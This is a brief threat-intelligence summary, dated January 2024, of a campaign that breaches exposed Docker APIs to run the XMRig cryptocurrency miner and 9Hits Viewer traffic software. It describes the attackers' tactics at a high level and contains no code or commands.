January 18, 2024 at 12:09PM
A novel campaign is targeting vulnerable Docker services by deploying XMRig cryptocurrency miner and 9Hits Viewer software to generate revenue. The campaign uses various strategies to drive traffic to websites, breaching servers to deploy malicious containers via Docker API. The impact includes resource exhaustion and potential for a serious breach.
Key takeaways from the meeting notes are as follows:
– Vulnerable Docker services are being targeted by threat actors deploying the XMRig cryptocurrency miner and the 9Hits Viewer software to monetize compromised hosts.
– This is the first documented case of malware deploying the 9Hits application as a payload, indicating a diversification in adversaries’ strategies to make money from compromised hosts.
– The 9Hits application is promoted as a web traffic solution, where members can drive traffic to their sites by using the 9Hits Viewer software to visit requested websites and earn credits.
– The exact method of spreading the malware to vulnerable Docker hosts is currently unclear, but it’s suspected to involve the use of search engines like Shodan to scan for targets.
– Campaigns targeting Docker typically pull generic images from Dockerhub and leverage them for their malicious activities.
– The 9Hits container is used to execute code to generate credits for the attacker and can visit specific types of sites while preventing visits to cryptocurrency-related sites.
– The XMRig miner, when deployed, connects to a private mining pool, leading to resource exhaustion on compromised hosts and potentially leaving a remote shell on the system.
These takeaways give insight into the nature of the security threat and the tactics used by threat actors in targeting vulnerable Docker services.